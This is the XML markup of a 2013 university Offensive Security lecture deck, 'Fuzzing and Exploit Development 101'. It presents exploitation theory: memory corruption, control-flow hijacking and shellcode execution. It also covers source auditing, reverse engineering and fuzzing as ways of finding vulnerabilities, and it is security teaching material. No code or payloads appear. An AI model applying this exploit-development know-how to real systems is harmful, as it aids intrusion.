            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425"/>
          <a:lstStyle>
            <a:lvl1pPr lvl="0"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1pPr>
            <a:lvl2pPr lvl="1"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2pPr>
            <a:lvl3pPr lvl="2"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3pPr>
            <a:lvl4pPr lvl="3"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4pPr>
            <a:lvl5pPr lvl="4"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5pPr>
            <a:lvl6pPr lvl="5"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6pPr>
            <a:lvl7pPr lvl="6"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7pPr>
            <a:lvl8pPr lvl="7"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8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="4400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Shape 33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229600" cy="4526100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425"/>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="34" name="Shape 34"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="10800000">
            <a:off x="5734187" y="4047858"/>
            <a:ext cx="3409813" cy="2810236"/>
            <a:chOff x="0" y="1494"/>
            <a:chExt cx="3409813" cy="2810236"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="35" name="Shape 35"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="245543"/>
              <a:ext cx="32511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6" name="Shape 36"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="-5400000">
              <a:off x="-1212177" y="1407880"/>
              <a:ext cx="2806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7" name="Shape 37"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="474143"/>
              <a:ext cx="26670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8" name="Shape 38"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="702743"/>
              <a:ext cx="2167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9" name="Shape 39"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="931343"/>
              <a:ext cx="18627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0" name="Shape 40"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="1159943"/>
              <a:ext cx="14901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1" name="Shape 41"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="1388543"/>
              <a:ext cx="1219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2" name="Shape 42"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="1617143"/>
              <a:ext cx="9906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3" name="Shape 43"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="1845743"/>
              <a:ext cx="745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4" name="Shape 44"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="2074343"/>
              <a:ext cx="5334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5" name="Shape 45"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="2302944"/>
              <a:ext cx="262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6" name="Shape 46"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="-5400000">
              <a:off x="-814261" y="1238115"/>
              <a:ext cx="24684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7" name="Shape 47"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="-5400000">
              <a:off x="-357712" y="1014528"/>
              <a:ext cx="20181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8" name="Shape 48"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="-5400000">
              <a:off x="-853" y="887577"/>
              <a:ext cx="17640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9" name="Shape 49"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="-5400000">
              <a:off x="326307" y="790194"/>
              <a:ext cx="15693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0" name="Shape 50"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="-5400000">
              <a:off x="636517" y="709727"/>
              <a:ext cx="1408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1" name="Shape 51"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="-5400000">
              <a:off x="972229" y="603962"/>
              <a:ext cx="11967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2" name="Shape 52"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="-5400000">
              <a:off x="1278237" y="527761"/>
              <a:ext cx="10443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3" name="Shape 53"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="-5400000">
              <a:off x="1590398" y="440777"/>
              <a:ext cx="8796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4" name="Shape 54"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="-5400000">
              <a:off x="1883657" y="377227"/>
              <a:ext cx="7527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5" name="Shape 55"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="-5400000">
              <a:off x="2198067" y="292494"/>
              <a:ext cx="583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6" name="Shape 56"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="-5400000">
              <a:off x="2521028" y="199377"/>
              <a:ext cx="397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7" name="Shape 57"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="-5400000">
              <a:off x="2801688" y="148627"/>
              <a:ext cx="295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8" name="Shape 58"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="-5400000">
              <a:off x="3079243" y="102444"/>
              <a:ext cx="2016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9" name="Shape 59"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="-5400000">
              <a:off x="3324763" y="85077"/>
              <a:ext cx="168600" cy="1500"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln cap="flat" cmpd="sng" w="12700">
              <a:solidFill>
                <a:srgbClr val="B7CCE4">
                  <a:alpha val="53725"/>
                </a:srgbClr>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd len="med" w="med" type="none"/>
              <a:tailEnd len="med" w="med" type="none"/>
            </a:ln>
          </p:spPr>
        </p:cxn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en.wikipedia.org/wiki/Software_testing" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Random_data" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Computer_program" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Crash_(computing)" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Assertion_(computing)" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Memory_lea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cs.fsu.edu/~redwood/OffensiveSecurity/reversing/FSU_Reversing_binaries.zip" TargetMode="External"/><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www.utf8-chartable.de/unicode-utf8-table.pl?start=768&amp;number=128&amp;names=-&amp;utf8=0x"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code.google.com/p/corkami/downloads/detail?name=CorkaMIX.zip&amp;can=2&amp;q=" TargetMode="External"/><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rmadair.github.com/fuzze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reuters.com/article/2013/01/28/us-iran-nuclear-idUSBRE90R06820130128" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wnd.com/2013/01/sabotage-key-iranian-nuclear-facility-hit/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.telegraph.co.uk/news/worldnews/middleeast/iran/9831282/Mystery-over-explosion-at-Irans-Fordow-nuclear-site.html" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9.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www.first.org/cvss#" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.first.org/cvss/faq"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youtube.com/watch?v=WaPni5O2YyI"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7.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.tenouk.com/Bufferoverflowc/Bufferoverflow1c.html"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7.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.tenouk.com/Bufferoverflowc/Bufferoverflow1c.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nytimes.com/2012/10/30/science/rethinking-the-computer-at-80.html?pagewanted=all&amp;_r=0" TargetMode="Externa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8.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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2266576"/>
            <a:ext cx="6400800" cy="1333800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Fuzzing and Exploit Development 101</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94" name="Shape 94"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="3600451"/>
            <a:ext cx="6400800" cy="900600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>CIS 4930 / CIS 5930</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Offensive Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Spring 2013</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Exploitation Theory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="152" name="Shape 152"/>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indent="-419100" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000"/>
              <a:t>The computer industry has a bad habit of repeating old mistakes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000"/>
              <a:t>Driven by market forces</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000"/>
              <a:t>developing new CPU's / systems on new computational models costs more $$$$ for the consumer due to R&amp;D</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3000"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr i="1" sz="3000">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="153" name="Shape 153"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3651300" y="5409988"/>
            <a:ext cx="5035500" cy="1134900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="4800"/>
              <a:t>So lets get to it!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Exploitation Theory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="159" name="Shape 159"/>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indent="-228600" lvl="0" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000"/>
              <a:t>Most of security is putting bandages on problems caused by old problems or design choices</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="160" name="Shape 160"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3898899" y="2963488"/>
            <a:ext cx="4787901" cy="3581400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="161" name="Shape 161"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="961475" y="4824425"/>
            <a:ext cx="2935500" cy="1020900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>Sometimes, its like patching up an old plane with duct tape!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Exploitation Theory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="167" name="Shape 167"/>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lang="en"/>
              <a:t>General Exploitation Theory:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Due to the inability to distinguish between instructions and data in Von Neumann architecture machines, we can corrupt data with instructions and hijack control flow.  This is also because data contains control flow data that is used to direct the execution of the instructions by the processor.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Most exploits can be generalized into a three step process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Some sort of memory corruption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Change / hijacking of control flow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Execution of the shellcode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRP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Discovering Vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="173" name="Shape 173"/>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lang="en"/>
              <a:t>Three Primary Methods:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Source Code Auditing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Requires source code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Reverse Engineering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Can be done without source code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Requires binary applications (i.e. not interpreted languages)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>very time consuming and requires high technical skill</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" u="sng"/>
              <a:t>Fuzzing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Lots of tools / frameworks exist</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
